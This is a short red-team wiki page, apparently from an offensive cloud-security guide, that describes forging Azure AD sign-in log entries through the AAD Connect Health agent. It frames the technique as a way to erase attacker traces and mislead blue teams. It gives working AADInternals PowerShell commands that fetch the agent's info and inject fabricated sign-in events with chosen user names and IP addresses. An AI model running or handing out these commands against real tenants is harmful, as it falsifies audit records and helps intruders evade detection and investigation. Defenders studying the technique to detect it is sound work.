Spoofing Azure Sign-In Logs

In hybrid environments, every attacker with local administrator access can spoof AAD Sign-In events and every attacker with Global Administrator permissions can register fake agents to AAD. This technique can both be used to remove tracks and IOCs but also to add further "noise" to distract and mislead blue team operators.

AAD Connect Health is an agent that monitors the connection between the on-prem environment and the cloud infrastructure ensuring that there is a reliable connection between the two; another thing this agent does is reading the on-prem security event log checking for AAD logons, everytime a logon occurs (EventID 1200) the agent will send the same event into the AAD event logs.

The following is a diagram of the authentication flow

To perform this attack we need to have a valid Agent Key for the AAD Connect Health agent

PS /home/otter> $agentInfo = Get-AADIntHybridHealthServiceAgentInfo

Now we can generate new events to add to the logs

PS /home/otter> $events = @(
>> New-AADIntHybridHealtServiceEvent -Server $agentInfo.Server -UPN "otter1@minions.com" -IPAddress "1.1.1.1" -NetworkLocationType Extranet
>> New-AADIntHybridHealtServiceEvent -Server $agentInfo.Server -UPN "otter2@minions.com" -IPAddress "2.2.2.2" -NetworkLocationType Extranet
>> )
PS /home/otter> Send-AADIntHybridHealthServiceEvents -AgentInfo $agentInfo -Events $events -Verbose

PreviousDisabling Auditing (Unified Audit Logs)NextRegistering Fake Agents for Log Spoofing

Last updated 4 months ago